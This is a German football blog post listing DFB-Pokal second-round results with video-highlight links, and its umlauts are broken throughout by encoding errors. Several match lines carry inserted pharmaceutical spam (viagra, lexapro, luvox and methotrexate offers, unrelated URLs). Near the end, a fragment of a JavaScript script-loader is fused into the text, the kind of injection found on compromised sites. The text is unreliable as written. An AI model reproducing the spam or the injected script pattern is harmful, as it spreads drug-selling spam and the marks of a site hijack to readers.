Bremen, Gladbach, NA?rnberg und Braunschweig durften sich nach dem enttAi??uschenden Ausscheiden in Runde 1 in Ruhe auf das nAi??chste Ligawochenende vorbereiten. Der Rest der Erstligisten konnte sich im sportlichen Wettkampf mit 15 Mannschaften aus der 2. Bundesliga, vier Vertretern aus der dritten Liga (PreuAYen MA?nster, 1. FC SaarbrA?cken, VfL OsnabrA?ck, SV Darmstadt 98) und einem A?berraschungsteam aus der Regionalliga (SC WiedenbrA?ck 2000) messen.

Die Ergebnisse seht ihr in der nachfolgenden Auflistung von Spielberichten u.a. von der ARD Sportschau, ZDF Sportreportage, den Dritten Programmen und DFB.tv

online Dienstag 24.09.
KAi??ln wirft Mainz aus dem Pokal, Dortmund und Hoffenheim machen es spannend, siegen aber am Ende in VerlAi??ngerungen doch noch, ansonsten durchweg recht souverAi??ne Favoritensiege.

SC PreuAYen MA?nster – FC Augsburg 0:3 => buy cod sexual pills Video-Highlights
SC WiedenbrA?ck – SV Sandhausen 1:3 => Video-Highlights (auch hier)
TSV 1860 MA?nchen – Borussia Dortmund 0:2 n.V. => Video-Highlights (auch hier, hier, hier und hier)
VfL Wolfsburg – VfR Aalen 2:0 => Video-Highlights
DSC Arminia Bielefeld – Bayer 04 Leverkusen 0:2 => Video-Highlights (auch hier)
Hamburger SV – SpVgg Greuther FA?rth 1:0 => Video-Highlights (auch hier lexapro without rx. Pills )
1899 Hoffenheim – FC Energie Cottbus 3:0 n.V. => Video-Highlights
1. FSV Mainz 05 – 1. FC KAi??ln 0:1 => Video-Highlights (auch hier und hier)

Mittwoch 25.09.
Die Berliner blamieren sich auf dem Lauterer Betzenberg und auch Paderborn bleibt bei einem unterklassigen Klub hAi??ngen. Eine groAYe A?berraschung haben aber auch die Freiburger mit einem Derbysieg gegen den VfB Stuttgart geschafft.

1. FC SaarbrA?cken – SC Paderborn 07 2:1 => http://carsten-scholz.info/?p=13170 Video-Highlights
Eintracht Frankfurt – VfL Bochum 1848 2:0 => Video-Highlights
FSV Frankfurt 1899 – FC Ingolstadt 04 0:2 => Video-Highlights
1. FC Kaiserslautern – Hertha BSC 3:1 => Video-Highlights
VfL OsnabrA?ck – 1. FC Union Berlin 0:1 => Video-Highlights
Darmstadt 98 – FC Schalke 04 1:3 => Video-Highlights (hier die Komplettaufzeichnung 1. Order http://www.corporenacida.com/?p=6483 und 2. Halbzeit)
FC Bayern MA?nchen – Hannover 96 4:1 => Video-Highlights (auch hier viagra tablets india. how much does luvox cr cost Buy und hier http://www.ferienvietnam.com/2018/02/02/methotrexate-shot-price/ )
Sport-Club Freiburg – VfB Stuttgart 2:1 => venda de viagra online Video-Highlights Buy (auch hier)

Weiter geht es am 3. und 4. Dezember mit dem Achtelfinale des Wettbewerbs, die Auslosung der Partien gibt’s am 28 September in der ARD-Sportschau.d.getElementsByTagName(‚head‘)[0].appendChild(s); brand viagra hawaii, sildenafil citrate tablets 50mg. Buy

Seiten: 1 2 3 4 5 6